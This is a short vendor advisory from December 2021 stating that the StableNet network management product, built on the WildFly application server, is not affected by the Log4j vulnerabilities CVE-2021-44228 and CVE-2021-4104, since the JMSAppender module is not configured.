StableNet® is not affected by the known Log4j vulnerabilities
Würzburg, December 15th, 2021
WildFly from Red Hat is used as the application server for StableNet®. The version of WildFly we use provides functions for logging, which are based on log4j v1. However, according to an internal audit by Red Hat, the components used are not affected by the attack vectors described in CVE-2021-44228.
To ensure that this is the case, all StableNet®-related components have undergone extensive testing by our development department. These checks confirmed the above statement for versions 9.x, 10.x and 11.x as well as all business scripts. Older versions before 9.x were not checked.
Furthermore the vulnerability in the Log4J v1 library related to the above is described in CVE-2021-4104. This flaw ONLY affects applications which are specifically configured to use JMSAppender (which is not the default), or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker’s JMS Broker. With Wildfly and all StableNet® components, this JMSAppender is not configured. In this case, you need direct write access to the Log4j configuration file in order to exploit the vulnerability. If you have this access, you can also simply execute the code you want directly without having to exploit the vulnerability.
Neither StableNet® nor WildFly uses any of the affected modules. As such, StableNet® users are also not affected by known issues with Log4J v1.
For more information on Wildfly and the found vulnerabilities please check out Wildfly’s newspage.